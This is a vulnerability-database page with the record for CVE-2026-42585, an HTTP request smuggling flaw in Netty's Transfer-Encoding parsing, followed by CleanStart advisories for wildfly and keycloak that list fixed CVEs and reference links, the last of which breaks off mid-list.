Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-42585 (GCVE-0-2026-42585)
Vulnerability from cvelistv5 – Published: 2026-05-13 18:12 – Updated: 2026-05-15 20:34
VLAI
EPSS
Title
Netty: HTTP Request Smuggling due to malformed Transfer-Encoding
Summary
Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.
Severity
6.5 (Medium)
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-444 - Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://github.com/netty/netty/security/advisorie… | x_refsource_CONFIRM |
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| netty | netty |
Affected:
>= 4.2.0.Alpha1, < 4.2.13.Final
Affected: < 4.1.133.Final |
|
| io.netty | netty-codec-http |
Affected:
>= 4.2.0.Alpha1, < 4.2.13.Final
Affected: < 4.1.133.Final |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-42585",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-15T20:33:59.288432Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-15T20:34:21.305Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "netty",
"vendor": "netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
},
{
"product": "netty-codec-http",
"vendor": "io.netty",
"versions": [
{
"status": "affected",
"version": "\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final"
},
{
"status": "affected",
"version": "\u003c 4.1.133.Final"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-444",
"description": "CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-13T18:13:17.497Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv"
}
],
"source": {
"advisory": "GHSA-38f8-5428-x5cv",
"discovery": "UNKNOWN"
},
"title": "Netty: HTTP Request Smuggling due to malformed Transfer-Encoding"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-42585",
"datePublished": "2026-05-13T18:12:39.586Z",
"dateReserved": "2026-04-28T17:26:12.086Z",
"dateUpdated": "2026-05-15T20:34:21.305Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-42585",
"date": "2026-06-22",
"epss": "0.00239",
"percentile": "0.14699"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-42585\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-13T19:17:24.187\",\"lastModified\":\"2026-05-18T12:24:23.970\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":2.5},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-444\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.1.133\",\"matchCriteriaId\":\"DFE205A5-2C43-40C9-A2FF-CF6759B8D861\"},{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"4.2.0\",\"versionEndExcluding\":\"4.2.13\",\"matchCriteriaId\":\"D94A720F-9CED-4BE9-8C37-FD9E2FD28472\"}]}]}],\"references\":[{\"url\":\"https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42585\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-15T20:33:59.288432Z\"}}}], \"references\": [{\"url\": \"https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-15T20:33:01.224Z\"}}], \"cna\": {\"title\": \"Netty: HTTP Request Smuggling due to malformed Transfer-Encoding\", \"source\": {\"advisory\": \"GHSA-38f8-5428-x5cv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"netty\", \"product\": \"netty\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final\"}, {\"status\": \"affected\", \"version\": \"\u003c 4.1.133.Final\"}]}, {\"vendor\": \"io.netty\", \"product\": \"netty-codec-http\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 4.2.0.Alpha1, \u003c 4.2.13.Final\"}, {\"status\": \"affected\", \"version\": \"\u003c 4.1.133.Final\"}]}], \"references\": [{\"url\": \"https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv\", \"name\": \"https://github.com/netty/netty/security/advisories/GHSA-38f8-5428-x5cv\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-444\", \"description\": \"CWE-444: Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-13T18:13:17.497Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-42585\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-15T20:34:21.305Z\", \"dateReserved\": \"2026-04-28T17:26:12.086Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-13T18:12:39.586Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
cleanstart-2026-ru36468
Vulnerability from cleanstart
Published
2026-06-08 14:00
Modified
2026-06-04 05:30
Summary
Security fixes for CVE-2026-0636, CVE-2026-3260, CVE-2026-33558, CVE-2026-33870, CVE-2026-33871, CVE-2026-3505, CVE-2026-35554, CVE-2026-41417, CVE-2026-42402, CVE-2026-42403, CVE-2026-42404, CVE-2026-42578, CVE-2026-42579, CVE-2026-42580, CVE-2026-42581, CVE-2026-42583, CVE-2026-42584, CVE-2026-42585, CVE-2026-42587, CVE-2026-5588, CVE-2026-5598, ghsa-287c-fxr7-3w6c, ghsa-2hfh-9h53-qc24, ghsa-38f8-5428-x5cv, ghsa-45q3-82m4-75jr, ghsa-57rv-r2g8-2cj3, ghsa-5qcv-4rpc-jp93, ghsa-72hv-8253-57qq, ghsa-c3fc-8qff-9hwx, ghsa-cj8j-37rh-8475, ghsa-cm33-6792-r9fm, ghsa-f6hv-jmp6-3vwv, ghsa-g36m-9g3m-2vmp, ghsa-m4cv-j2px-7723, ghsa-mj4r-2hfc-f8p6, ghsa-p93r-85wp-75v3, ghsa-pwqr-wmgm-9rr8, ghsa-v8h7-rr48-vmmv, ghsa-w9fj-cfpg-grvv, ghsa-wf66-mphr-4c4r, ghsa-wg6q-6289-32hp, ghsa-xxqh-mfjm-7mv9 applied in versions: 39.0.1-r0
Details
Multiple security vulnerabilities affect the wildfly package. These issues are resolved in later releases. See references for individual vulnerability details.
References
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "wildfly"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "39.0.1-r0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the wildfly package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-RU36468",
"modified": "2026-06-04T05:30:36Z",
"published": "2026-06-08T14:00:50.454920Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-RU36468.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-0636"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-3260"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33558"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33870"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33871"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-3505"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-35554"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41417"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42402"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42403"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42404"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42578"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42579"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42580"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42581"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42583"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42584"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42585"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42587"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-5588"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-5598"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-287c-fxr7-3w6c"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2hfh-9h53-qc24"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-38f8-5428-x5cv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-45q3-82m4-75jr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-57rv-r2g8-2cj3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-5qcv-4rpc-jp93"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-72hv-8253-57qq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c3fc-8qff-9hwx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cj8j-37rh-8475"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cm33-6792-r9fm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f6hv-jmp6-3vwv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-g36m-9g3m-2vmp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m4cv-j2px-7723"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-mj4r-2hfc-f8p6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-p93r-85wp-75v3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pwqr-wmgm-9rr8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v8h7-rr48-vmmv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w9fj-cfpg-grvv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wf66-mphr-4c4r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wg6q-6289-32hp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xxqh-mfjm-7mv9"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0636"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3260"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33558"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33870"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33871"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3505"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35554"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41417"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42402"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42403"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42404"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42580"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42581"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42583"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42584"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42585"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42587"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5588"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5598"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2026-0636, CVE-2026-3260, CVE-2026-33558, CVE-2026-33870, CVE-2026-33871, CVE-2026-3505, CVE-2026-35554, CVE-2026-41417, CVE-2026-42402, CVE-2026-42403, CVE-2026-42404, CVE-2026-42578, CVE-2026-42579, CVE-2026-42580, CVE-2026-42581, CVE-2026-42583, CVE-2026-42584, CVE-2026-42585, CVE-2026-42587, CVE-2026-5588, CVE-2026-5598, ghsa-287c-fxr7-3w6c, ghsa-2hfh-9h53-qc24, ghsa-38f8-5428-x5cv, ghsa-45q3-82m4-75jr, ghsa-57rv-r2g8-2cj3, ghsa-5qcv-4rpc-jp93, ghsa-72hv-8253-57qq, ghsa-c3fc-8qff-9hwx, ghsa-cj8j-37rh-8475, ghsa-cm33-6792-r9fm, ghsa-f6hv-jmp6-3vwv, ghsa-g36m-9g3m-2vmp, ghsa-m4cv-j2px-7723, ghsa-mj4r-2hfc-f8p6, ghsa-p93r-85wp-75v3, ghsa-pwqr-wmgm-9rr8, ghsa-v8h7-rr48-vmmv, ghsa-w9fj-cfpg-grvv, ghsa-wf66-mphr-4c4r, ghsa-wg6q-6289-32hp, ghsa-xxqh-mfjm-7mv9 applied in versions: 39.0.1-r0",
"upstream": [
"CVE-2026-0636",
"CVE-2026-3260",
"CVE-2026-33558",
"CVE-2026-33870",
"CVE-2026-33871",
"CVE-2026-3505",
"CVE-2026-35554",
"CVE-2026-41417",
"CVE-2026-42402",
"CVE-2026-42403",
"CVE-2026-42404",
"CVE-2026-42578",
"CVE-2026-42579",
"CVE-2026-42580",
"CVE-2026-42581",
"CVE-2026-42583",
"CVE-2026-42584",
"CVE-2026-42585",
"CVE-2026-42587",
"CVE-2026-5588",
"CVE-2026-5598",
"ghsa-287c-fxr7-3w6c",
"ghsa-2hfh-9h53-qc24",
"ghsa-38f8-5428-x5cv",
"ghsa-45q3-82m4-75jr",
"ghsa-57rv-r2g8-2cj3",
"ghsa-5qcv-4rpc-jp93",
"ghsa-72hv-8253-57qq",
"ghsa-c3fc-8qff-9hwx",
"ghsa-cj8j-37rh-8475",
"ghsa-cm33-6792-r9fm",
"ghsa-f6hv-jmp6-3vwv",
"ghsa-g36m-9g3m-2vmp",
"ghsa-m4cv-j2px-7723",
"ghsa-mj4r-2hfc-f8p6",
"ghsa-p93r-85wp-75v3",
"ghsa-pwqr-wmgm-9rr8",
"ghsa-v8h7-rr48-vmmv",
"ghsa-w9fj-cfpg-grvv",
"ghsa-wf66-mphr-4c4r",
"ghsa-wg6q-6289-32hp",
"ghsa-xxqh-mfjm-7mv9"
]
}
cleanstart-2026-vj37814
Vulnerability from cleanstart
Published
2026-05-18 13:37
Modified
2026-05-07 10:32
Summary
Security fixes for CVE-2025-59250, CVE-2026-1002, CVE-2026-33870, CVE-2026-33871, CVE-2026-39852, CVE-2026-41417, CVE-2026-42198, CVE-2026-42577, CVE-2026-42578, CVE-2026-42579, CVE-2026-42580, CVE-2026-42581, CVE-2026-42583, CVE-2026-42584, CVE-2026-42585, CVE-2026-42587, CVE-2026-5588, CVE-2026-5598, ghsa-38f8-5428-x5cv, ghsa-3p8m-j85q-pgmj, ghsa-45p5-v273-3qqr, ghsa-45q3-82m4-75jr, ghsa-4cx2-fc23-5wg6, ghsa-57rv-r2g8-2cj3, ghsa-9342-92gg-6v29, ghsa-98qh-xjc8-98pq, ghsa-c3fc-8qff-9hwx, ghsa-cm33-6792-r9fm, ghsa-cphf-4846-3xx9, ghsa-fghv-69vj-qj49, ghsa-h5fg-jpgr-rv9c, ghsa-hq9p-pm7w-8p54, ghsa-j288-q9x7-2f5v, ghsa-m4cv-j2px-7723, ghsa-mj4r-2hfc-f8p6, ghsa-p93r-85wp-75v3, ghsa-pwqr-wmgm-9rr8, ghsa-rc95-pcm8-65v9, ghsa-rwm7-x88c-3g2p, ghsa-v8h7-rr48-vmmv, ghsa-w9fj-cfpg-grvv, ghsa-wg6q-6289-32hp, ghsa-xxqh-mfjm-7mv9 applied in versions: 26.1.4-r1, 26.4.11-r0, 26.4.11-r2
Details
Multiple security vulnerabilities affect the keycloak package. These issues are resolved in later releases. See references for individual vulnerability details.
References
| URL | Type | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "keycloak"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "26.4.11-r2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the keycloak package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-VJ37814",
"modified": "2026-05-07T10:32:20Z",
"published": "2026-05-18T13:37:33.552809Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-VJ37814.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-59250"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-1002"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33870"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33871"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-39852"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41417"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42198"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42577"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42578"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42579"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42580"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42581"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42583"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42584"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42585"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-42587"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-5588"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-5598"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-38f8-5428-x5cv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3p8m-j85q-pgmj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-45p5-v273-3qqr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-45q3-82m4-75jr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-4cx2-fc23-5wg6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-57rv-r2g8-2cj3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9342-92gg-6v29"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-98qh-xjc8-98pq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c3fc-8qff-9hwx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cm33-6792-r9fm"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-cphf-4846-3xx9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fghv-69vj-qj49"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-h5fg-jpgr-rv9c"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-hq9p-pm7w-8p54"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-j288-q9x7-2f5v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-m4cv-j2px-7723"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-mj4r-2hfc-f8p6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-p93r-85wp-75v3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pwqr-wmgm-9rr8"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rc95-pcm8-65v9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rwm7-x88c-3g2p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-v8h7-rr48-vmmv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w9fj-cfpg-grvv"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-wg6q-6289-32hp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xxqh-mfjm-7mv9"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59250"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1002"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33870"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33871"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39852"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41417"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42198"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42577"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42578"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42579"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42580"
},
